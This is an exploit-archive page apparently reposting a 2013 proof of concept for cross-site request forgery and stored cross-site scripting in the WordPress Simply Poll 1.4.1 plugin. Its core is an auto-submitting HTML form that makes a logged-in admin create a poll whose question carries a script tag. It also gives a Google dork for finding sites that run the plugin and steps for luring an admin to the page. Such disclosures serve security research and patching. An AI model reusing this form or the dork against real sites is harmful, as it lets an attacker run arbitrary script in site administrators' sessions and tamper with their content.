WordPress Simply Poll 1.4.1 CSRF / XSS

WordPress Simply Poll 1.4.1 CSRF / XSS: Posted Mar 18, 2013; Authored by m3tamantra; WordPress Simply Poll third party plugin version 1.4.1 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | ddddad68953e748aca3717d171b456e43176604fc0cffd022c7d37a8ba52922e; Download | Favorite | View

WordPress Simply Poll 1.4.1 CSRF / XSS

# Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS
# Google Dork: inurl:"/wp-content/plugins/simply-poll
# Date: 16.03.2013
# Exploit Author: m3tamantra
# Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/
# Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip
# Version: 1.4.1
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
 
Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted.
 
Description:
- The question parameter is vulnerable to XSS
- Simply Poll has an CSRF vulnerability (Polls=>Add New)
 
The PoC leads to arbitrary javascript execution in back-end area.
 
Steps to exploit the Flaw:
- Save PoC code in html file
- Send a link (pointing to the PoC html file) to a logged in admin
- When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter
- When the admin views the Polls the javascript Code will execute
 
Note: this was just an example, it is also possible to remove, reset and edit all Polls.
 
[code]
<html>
<head>
<title>Simply Poll CSRF and XSS</title>
</head>
<body>
<!-- replace "127.0.0.1:9001/wordpress" -->
<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=sp-add" method="post">
<input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' />
<input type="hidden" name="answers[1][answer]" value="yes" />
<input type="hidden" name="answers[2][answer]" value="no" />
<input type="hidden" name="answers[3][answer]" value="maybe" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[5][answer]" value="" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[6][answer]" value="" />
<input type="hidden" name="answers[7][answer]" value="" />
<input type="hidden" name="answers[8][answer]" value="" />
<input type="hidden" name="answers[9][answer]" value="" />
<input type="hidden" name="answers[10][answer]" value="" />
<input type="hidden" name="polledit" value="new" />
</form>
<script>document.forms[0].submit();</script>
 
</body>
</html>
[/code]

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

WordPress Simply Poll 1.4.1 CSRF / XSS

WordPress Simply Poll 1.4.1 CSRF / XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Simply Poll 1.4.1 CSRF / XSS

Share This

WordPress Simply Poll 1.4.1 CSRF / XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems